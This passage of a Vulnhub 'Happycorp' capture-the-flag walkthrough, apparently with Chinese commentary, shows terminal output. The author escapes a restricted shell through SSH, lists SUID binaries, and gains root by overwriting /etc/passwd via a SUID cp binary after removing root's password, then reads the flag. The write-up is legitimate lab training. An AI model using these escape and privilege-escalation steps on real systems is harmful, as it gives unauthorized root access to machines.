rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$ ^C
karl@happycorp:~$ id
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
^Crbash: fork: Interrupted system call
指定shell,重新連線:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ssh -i id_rsa [email protected] -t '/bin/sh'
Enter passphrase for key 'id_rsa':
$ id
uid=1001(karl) gid=1001(karl) groups=1001(karl)
$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/sbin/mount.nfs
/bin/mount
/bin/ping
/bin/cp
/bin/umount
/bin/su
$
可利用cp命令的SUID位
$ cp /etc/passwd /home/karl
$ cd /home/karl
$ ls -alh
total 32K
drwxr-xr-x 3 karl karl 4.0K Dec 4 08:18 .
drwxr-xr-x 3 root root 4.0K Mar 4 2019 ..
lrwxrwxrwx 1 root root 9 Mar 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 karl karl 220 Mar 4 2019 .bash_logout
-rw-r--r-- 1 karl karl 3.5K Mar 5 2019 .bashrc
-rw------- 1 karl karl 28 Mar 4 2019 .lesshst
-rw-r--r-- 1 root karl 1.4K Dec 4 08:18 passwd
-rw-r--r-- 1 karl karl 675 Mar 4 2019 .profile
drwx------ 2 karl karl 4.0K Mar 5 2019 .ssh
$
不需要用到cp來提權,只需要將passwd檔案下載到本地,然後刪除root的密碼,上傳檔案並覆蓋原有的檔案即可。
$ su - root
root@happycorp:~# cd /root
root@happycorp:~# ls
root.txt
root@happycorp:~# cat root.txt
Congrats!
flag2{aGFja2VyZ29k}
Here is some useless ascii art :)
,----------------, ,---------,
,-----------------------, ," ,"|
," ,"| ," ," |
+-----------------------+ | ," ," |
| .-----------------. | | +---------+ |
| | | | | | -==----'| |
| | | | | | | |
| | Hacker God | | |/----|`---= | |
| | C:\>_ | | | ,/|==== ooo | ;
| | | | | // |(((( [33]| ,"
| `-----------------' |," .;'| |(((( | ,"
+-----------------------+ ;; | | |,"
/_)______________(_/ //' | +---------+
___________________________/___ `,
/ oooooooooooooooo .o. oooo /, \,"-----------
/ ==ooooooooooooooo==.o. ooo= // ,`\--{)B ,"
/_==__==========__==_ooo__ooo=_/' /___________,"
-Zayotic
root@happycorp:~#